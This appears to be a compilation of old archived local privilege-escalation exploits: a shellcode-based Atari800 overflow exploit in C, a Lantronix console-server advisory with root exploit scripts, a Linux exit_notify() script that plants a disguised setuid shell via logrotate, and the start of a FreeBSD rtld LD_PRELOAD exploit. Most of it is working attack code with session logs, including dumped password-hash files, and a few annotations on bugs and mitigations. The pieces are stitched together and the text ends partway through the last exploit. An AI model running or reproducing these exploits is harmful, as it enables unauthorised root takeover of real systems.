int ussage(char *arg) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
/* NOTE(review): the string literal below spans raw line breaks with no
 * continuation characters, which is not a valid C string literal as
 * rendered here; the backslash continuations were probably lost when the
 * listing was reproduced. */
printf("\n\tUssage:\n\t[+] %s [options]\n
-? <this help screen>
-v choose a bug:
1 - first bug (in all versions Atari800)
2 - second bug (in older Atari800 - modiy argv[0])
3 - third bug (in config file - OS/A_ROM)
4 - fourth bug (in config file - OS/B_ROM)
5 - fifth bug (in config file - XL/XE_ROM)
6 - sixth bug (in config file - BASIC_ROM)
-o <offset>
-p PATH\n\n",arg);
exit(-1);
}
/*
 * Entry point. Parses -v (variant 1..6), -o (offset added to the value
 * from ret_ad()) and -p (target path, default PATH); verifies the target
 * can be opened and that CONFIG exists (writing a default one otherwise);
 * then builds the buffers for the chosen variant and execle()s the target
 * with `sh' as its environment. Returns 0 only when execle() returns.
 * With -v outside 1..6 control falls off the end of main (implicit 0).
 */
int main(int argc, char *argv[]) {
/* `ret' is the address written repeatedly through `buf_addr'. */
long ret,*buf_addr;
/* `envp' is filled with 0x90 and carries `shellcode' at its tail; it is
 * the single entry of the environment array `sh'. */
char envp[8196],*path=PATH;
static char *sh[0x02];
/* `buf' (DIRS bytes), `link' and `conf' are the per-variant scratch
 * buffers; not all variants use each of them. */
char buf[DIRS],link[500],conf[5000];
int i,opt,op2=0,offset=0;
FILE *fp;
while((opt = getopt(argc,argv,"p:o:v:?")) != -1) {
switch(opt) {
case 'o':
offset=atoi(optarg);
break;
case 'p':
path=optarg;
break;
case 'v':
op2=atoi(optarg);
break;
case '?':
default:
ussage(argv[0]);
break;
}
}
if (op2==0)
ussage(argv[0]);
/* Probe that the target is readable; the handle is closed immediately. */
if ( (fp=fopen(path,"r"))==NULL) {
printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);
ussage(argv[0]);
} fclose(fp);
/* Ensure CONFIG exists: if it cannot be opened for reading, create it
 * with default settings. Either way `fp' is closed afterwards. */
if ( (fp=fopen(CONFIG,"r"))==NULL) {
if ( (fp=fopen(CONFIG,"w"))==NULL) {
printf("I can\'t create config file!\n");
exit(-1);
}
printf("\nCreating config file...\n\n\n");
fprintf(fp,"Atari 800 Emulator, Version 1.3.0\n");
fprintf(fp,"OS/A_ROM=atariosa.rom\n");
fprintf(fp,"OS/B_ROM=atariosb.rom\n");
fprintf(fp,"XL/XE_ROM=atarixl.rom\n");
fprintf(fp,"BASIC_ROM=ataribas.rom\n");
fprintf(fp,"5200_ROM=\n");
fprintf(fp,"DISK_DIR=.\n");
fprintf(fp,"ROM_DIR=.\n");
fprintf(fp,"H1_DIR=\n");
fprintf(fp,"H2_DIR=\n");
fprintf(fp,"H3_DIR=\n");
fprintf(fp,"H4_DIR=\n");
fprintf(fp,"HD_READ_ONLY=1\n");
fprintf(fp,"EXE_DIR=\n");
fprintf(fp,"STATE_DIR=\n");
fprintf(fp,"PRINT_COMMAND=lpr %s\n");
fprintf(fp,"SCREEN_REFRESH_RATIO=1\n");
fprintf(fp,"MACHINE_TYPE=Atari XL/XE\n");
fprintf(fp,"RAM_SIZE=64\n");
fprintf(fp,"DEFAULT_TV_MODE=PAL\n");
fprintf(fp,"DISABLE_BASIC=1\n");
fprintf(fp,"ENABLE_SIO_PATCH=1\n");
fprintf(fp,"ENABLE_H_PATCH=1\n");
fprintf(fp,"ENABLE_P_PATCH=1\n");
fprintf(fp,"ENABLE_NEW_POKEY=1\n");
fprintf(fp,"STEREO_POKEY=0\n");
} fclose(fp);
/* Variant 1: the payload address is passed through the second argument
 * (`link'). NOTE(review): "%x" expects unsigned int but `ret' is long;
 * the same mismatch repeats in every variant below. */
if (op2==1) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using first bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(link,"AA");
buf_addr=(long*)&link[2];
/* NOTE(review): each iteration stores sizeof(long) bytes but advances
 * the count by 4, starting at offset 2; the final store runs past the
 * 500-byte `link' even where long is 4 bytes, and doubles the bytes
 * written on LP64. The `conf' loops below share this shape. */
for(i=0;i<500;i+=4)
*(buf_addr)++ = ret;
link[499]='\0';
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,link,0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
/* Variant 2: create a directory named by 250 'A's, symlink the target
 * inside it and run it via that path so that argv[0] is long. */
} else if (op2==2) {
system("rm -rf `perl -e 'print \"\\x41\"x250'`; rm -f 1");
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using second bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
memset(buf,0x41,(size_t)250);
strcpy(link,"./");
memset(&link[2],0x41,(size_t)252);
/* NOTE(review): mkdir/chdir/symlink are wrapped in assert(); with NDEBUG
 * defined these calls disappear entirely rather than merely unchecked. */
assert(mkdir(buf, 0755) != -1);
assert(chdir(buf) != -1);
buf_addr=(long*)buf;
for (i=0; i<80; i+=4)
*(buf_addr)++ = ret;
buf[80]='\0';
// snprintf(link+252,500,"/`perl -e \'print \"\\x01\\xee\\xff\\xbf\"x20\'` pi3");
snprintf(link+252,500,"/%s",buf);
assert(symlink(path, buf) != -1);
assert(chdir("../") != -1);
printf("\nExecuting the vuln program - %s\n\n",link);
// system(link);
execle(link,link,"pi3",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
/* Variants 3-6 differ only in which CONFIG key receives the long value
 * written to .pi3.conf, which is then passed with -config. */
} else if (op2==3) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using third bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"OS/A_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==4) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using fourth bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"AA");
buf_addr=(long*)&conf[2];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"OS/B_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==5) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using fifth bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
/* Variants 5 and 6 use a one-byte prefix instead of two. */
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"XL/XE_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
} else if (op2==6) {
printf("\n\t...::: -=[ exploit for Atari800 by pi3 (pi3ki31ny) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
printf("\t[+] Using sixth bug in Atari800\n");
memset(envp,0x90,sizeof(envp));
for (i=0; i<strlen(shellcode); i++)
envp[8196-strlen(shellcode)+i] = shellcode[i];
sh[0x00]=envp;
sh[0x01]=NULL;
strcpy(conf,"A");
buf_addr=(long*)&conf[1];
for(i=0;i<5000;i+=4)
*(buf_addr)++ = ret;
conf[4999]='\0';
system("rm -rf .pi3.conf");
if ( (fp=fopen(".pi3.conf","w")) == NULL) {
printf("I can\'t create config file!\nExiting...\n");
exit(-1);
}
fprintf(fp,"BASIC_ROM=%s\n",conf);
printf("\nExecuting the vuln program - %s\n\n",PATH);
execle(PATH,PATH,"-config",".pi3.conf",0,sh);
printf("Kazdemu trafi sie gowno...!\n");
return 0;
}
}
// milw0rm.com [2004-11-25]
c0ntex/lantronixRoot.txt ( na)
/*
*****************************************************************************************************************
$ An open security advisory #11 - Lantronix SCS Local Root Exploits
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com || c0ntex[@]open-security.org
2: Bug Released: August 05 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Local
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************
SCS820/1620 - Lantronix Secure Console Server
http://www.lantronix.com
"The SCS820 and SCS1620 are members of the ActiveLinx family of secure console servers (SCS).
With ActiveLinx secure console servers, system administrators can tackle local and remote IT
incidents in record time. IT professionals gain key business advantages such as reduced time
attending problems and lowered total cost of ownership for equipment and maintenance. Secure
console servers provide a significant return on investment with faster problem solving
capabilities and higher uptime."
Multiple security issues with Lantronix Secure Console Server mean that it is trivial for a
user to become root and cause trouble on the system by abusing buffer overflows and insecure
file system configurations.
1) Insecure /tmp and pipe permissions.
2) Directory traversal allowing local users unauthorised access to underlying Linux OS.
3) Sysadmin gains local root by abusing the fact that ci does not drop root privileges.
4) All users local root via edituser using return-to-libc and generic stack smash.
Lantronix have released a fix for these issues in their latest patch, Firmware v4.4
Example 1: Overwrite root owned files
----------
[c0ntex@SCS1620 /tmp]$ ls -al
total 2
drwxrwxrwx 2 root root 1024 Oct 31 00:50 ./
drwxr-xr-x 16 root root 1024 Oct 20 11:38 ../
prw-rw-rw- 1 root root 0 Oct 31 00:14 listen_fifo_server|
[c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
[c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server
Now user waits for system administrator to log in and do some work on the console:
sysadmin>listen 01
Please wait for connection..
sysadmin-DEVICE_01>logout
[sysadmin@SCS1620 /tmp]$ su - root
Password:
su: incorrect password # odd......
From another window:
[root@SCS1620 /tmp]# head /etc/shadow
j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
adm:*:11529:0:99999:7:::
Example 2: Directory traversal to gain access to underlying system
----------
c0ntex>?
Commands:
alias - List command aliases
cat - Print history buffer
clear - Clear port buffer
connections - show active connections
...
c0ntex>/bin/bash
/bin/bash: unknown command
c0ntex>
c0ntex>
c0ntex>../../../bin/bash
[c0ntex@SCS1620 /var/tmp]$
Example 3: Sysadmin becomes root
----------
sysadmin>
sysadmin>
sysadmin>bash
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ exit
sysadmin>../../../bin/cat /etc/shadow
root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
sysadmin>../../../bin/vi
~
~
~
~
~
:!cat /etc/shadow
root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
~
~
~
~
~
:q!
Run bash from the ci interface as sysadmin and from strace, we get the following:
sysadmin>bash
...
14441 [400d8367] getuid() = 500
14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0
and via directory traversal:
sysadmin> ../../../bin/bash
...
14392 [400ab367] getuid() = 500
14392 [400ab3c7] getgid() = 100
14392 [400ab397] geteuid() = 0
14392 [400ab3f7] getegid() = 100
...
sysadmin>../../../home/sysadmin/snakeoil 10719
Attached process [10719] OK!
++ Stack regsiters for PID of [10719] ++
Stack Address of %eax = [0xfffffe00]
Stack Address of %ecx = [0xbffff100]
Stack Address of %edx = [0x00000000]
Stack Address of %ebx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0x400d79a9]
Injecting %eip register with [0xbffff2bb]
++ Stack regsiters for PID of [10719] ++
Stack Address of %eax = [0xfffffe00]
Stack Address of %ecx = [0xbffff100]
Stack Address of %edx = [0x00000000]
Stack Address of %ebx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0xbffff2bb]
Detached process [10719] OK!
bash#
Example 4: Become root - Buffer overflow in edituser binary
The edituser binary is used to edit a users configuration parameters found in UserName.conf.
It lets you set escape sequences, server permissions and other basic user permissions and
features of the Secure Console Server.
During exploitation, edituser will strip \xff from the input, so you have to use a retaddr
that does not have the standard 0xbfff1234 type address. By creating a large pad environment
variable before running the test you can nudge your shellcode to a nice location, such as
0xbffe1234, which lets us get round this trivial obstacle. The return-to-libc method also
needs the stack nudge since the address for "/bin/sh" is stored in the environment.
[sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
-rwsr-xr-x 1 root root 12912 Apr 15 2003 edituser
[sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex
Password:
bash$ cp `which edituser` . && gdb -q ./edituser
no debugging symbols found)...gdb>
gdb>
gdb>r -b `perl -e 'printf "\x41" x 70'`
escape sequence is too long.
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:00000000 ebx:00000004 ecx:4001A94B edx:4010B140 eflags:00010246
esi:0804BC0C edi:00000000 esp:BFFEC748 ebp:41414141 eip:41414141
cs:0023 ds:002B es:002B fs:0000 gs:0000 ss:002B o d I t s Z a P c
[002B:BFFEC748]---------------------------------------------------------[stack]
BFFEC778 : 28 D6 04 08 6C C9 10 40 - 70 A8 00 40 94 F8 FE BF (...l..@p..@....
BFFEC768 : 8C 9B 04 08 01 00 00 00 - 60 BC 04 08 08 BC 04 08 ........`.......
BFFEC758 : BC BC 04 08 F0 C7 FE BF - 01 00 00 00 48 F8 FE BF ............H...
BFFEC748 : 41 41 41 41 41 41 41 41 - 41 41 00 08 FF FF FF FF AAAAAAAAAA......
[002B:0804BC0C]---------------------------------------------------------[ data]
0804BC0C : 39 BA 01 40 2C BA 01 40 - 1E BA 01 40 10 BA 01 40 9..@,..@...@...@
0804BC1C : 00 00 00 00 00 00 00 00 - 03 00 00 00 00 00 00 00 ................
[0023:41414141]---------------------------------------------------------[ code]
0x41414141: Error while running hook_stop:
Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb> q
//return-to-libc version for non-exec-stack systems
[c0ntex@SCS1620 ~]$ id -a
uid=501(c0ntex) gid=501(c0ntex) groups=501(c0ntex)
[c0ntex@SCS1620 ~]$ export STACKPAD=`perl -e 'print "A" x 65000'`
[c0ntex@SCS1620 /home/c0ntex]$ edituser -e `perl -e 'print "A" x 56'``printf "\x70\xe6\x05\x40\x70\xe6\x05\x40\x81\xfd\xfe\xbf"`
escape sequence is too long.
bash: /bin/bash/.bashrc: Not a directory
bash#
//general stack-smash version for older boxes
#!/bin/sh
# Lantronix Secure Console Server edituser root exploit by
# c0ntex - c0ntexb@gmail.com | c0ntex@open-security.org
# Advisory @ http://www.open-security.org/advisories/11
#
# The Linux system supplied by Lantronix does not have gnu
# C compiler, so the exploit is provided as a shell script
# as such, you might need to change the address for
#
#[c0ntex@SCS1620 ~/exploit]$ sh edituserxp.sh
#
# **** *** *** *** *** *** *** *** ***
#[-] Local root exploit for edituser using return-to-libc
#[-] discovered and written by c0ntex | c0ntexb@gmail.com
#Expect a root shell :-) -> escape sequence is too long.
#bash# id -a
#uid=0(root) gid=0(root) groups=100(users),0(root),200(admin)
#bash#
#
# NOTE(review): despite the banner above, this is the "general stack-smash
# version" announced just before the script on this page, not the
# return-to-libc one-liner. The advisory text above describes the flaw: the
# setuid-root edituser overflows a stack buffer on an over-long "-e" escape
# sequence. Vendor remedy named in the advisory: Firmware v4.4. Every value
# below is target-specific, as the header warns.
BUFFPAD="OPEN-SECURITY.ORG**OPEN-SECURITY.ORG**OPEN-SECURITY.ORG!"
NOPSLED=`perl -e 'print "\x41" x 1000'`
RETADDR=`printf "\x74\xc2\xfe\xbf"`
SETUID=`printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"`
# NOTE(review): this reassigns and exports SHELL, so every child process of
# this script (including the sleep/printf calls) sees a bogus login-shell
# variable.
SHELL=`printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"`
# Large exported variable used to shift the stack layout, per the "stack
# nudge" paragraph of the advisory above.
STACKPAD=`perl -e 'print "A" x 65000'`
VULNAP=/usr/local/bin/edituser
VULNOP="-e"
export BUFFPAD NOPSLED RETADDR SETUID SHELL STACKPAD VULNAP VULNOP
printf "\n **** *** *** *** *** *** *** *** ***\n"
printf "[-] Local root exploit for edituser\n"
printf "[-] discovered and written by c0ntex\n"
# NOTE(review): VULNAPP is never assigned (the variable defined above is
# VULNAP). With it empty the test runs as `[ -f ]`, which is true for any
# single non-empty argument, so this guard never actually checks the file.
if [ -f $VULNAPP ] ; then
printf "Expect a root shell :-) -> "; sleep 1
$VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
# A non-zero exit (the argument was rejected or the process crashed) leads to
# a single retry with a longer sled; there is no third attempt.
success=$?
if [ $success -gt 0 ] ; then
printf "\nSeems something messed up, changing NOPBUF to 10000 and trying again!\n"
sleep 2
unset NOPSLED
NOPSLED=`perl -e 'print "\x41" x 10000'`
printf "Expect a root shell :-) -> "
$VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
success=$?
if [ $success -gt 0 ] ; then
printf "\nAgain it failed, sorry you are on your own now :(\n"
fi
fi
fi
# NOTE(review): stray "EOF" with no matching heredoc; as a command it would
# only produce a "not found" error after all the work above is done.
EOF
Multiple Lantronix Secure Console Server local root exploits that make use of security issues allowing for unrestricted shell access.
gat3way/Linux Kernel exit_notify() Local Root ( na)
#!/bin/sh
###################################################################################
# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################
# Precondition from the header: a setuid process only dumps core when
# fs.suid_dumpable is non-zero. Leaving it at the default 0 is the
# configuration-level mitigation; the code-level fix is a kernel >= 2.6.29.
SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
# The core file is written into logrotate's config directory (see the chdir
# in exploit.c below), so nothing here is useful without logrotate.
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi
echo -e "Compiling the bash setuid() wrapper..."
# /tmp/.m: the program the embedded logrotate stanza later chowns to root and
# marks setuid. Its argv[0] of "[kthreadd]" is chosen to look like a kernel
# thread in process listings - a bash process with that name is a telltale
# for responders. Note the heredoc is appended (>>): a leftover /tmp/.m.c from
# an interrupted run would be compiled along with it.
cat >> /tmp/.m.c << EOF
#include <unistd.h>
#include <sys/types.h>
int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF
cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c
echo -e "Compiling the exploit code..."
# /tmp/.ex: clone()s a child whose exit signal is SIGSEGV, has the parent exec
# the setuid chfn with a logrotate config stanza as its argument, and has the
# child exec the setuid gpasswd and then exit. Per the header, the flawed
# exit_notify() check lets that exit signal reach the now-privileged parent,
# whose core dump (containing the stanza text) lands in its cwd,
# /etc/logrotate.d. Same >> caveat as above.
cat >> /tmp/exploit.c << EOF
#include <stdio.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>
int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}
int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF
cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c
echo -e "Setting coredump limits and running the exploit...\n"
# Core dumps must be enabled in this shell for the crashing process to write one.
ulimit -c 10000
# The stanza embedded in the chfn argument names /tmp/.a as the log to rotate;
# it has to exist for logrotate to act on the entry.
touch /tmp/.a
# The backticks are a no-op wrapper: all output is discarded, so the
# substitution expands to nothing and the binary simply runs.
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex
# Detection hint: an unexpected "core" file under /etc/logrotate.d, or a
# logrotate entry naming a path under /tmp, is the artefact this leaves behind.
if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi
echo "The system is not vulnerable, sorry :("
Linux Kernel versions below 2.6.29 exit_notify() local root exploit.
Kingcope/FreeBSD rtld Local Root Exploit ( na)
** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"
"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg
There is an unbelievably simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs for a long time *sigh*. Now it pays off.
The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.
Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#
Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN
*EXPLOIT*
#!/bin/sh
# NOTE(review): the "**" below is unquoted, so the shell globs it; with files in
# the current directory their names are printed in place of the asterisks.
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
# env.c: a launcher that discards the real environment and installs a
# hand-built environ array before exec'ing the setuid /sbin/ping. The first
# entry is allocated but never written (its contents are whatever malloc hands
# back); the second sets LD_PRELOAD. No headers beyond stdio.h are included,
# hence the implicit-declaration warnings in the session log above. The rtld
# releases listed under "Systems tested/affected" accept the LD_ variable in
# this situation; a fixed rtld is the remedy.
cat > env.c << _EOF
#include <stdio.h>
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
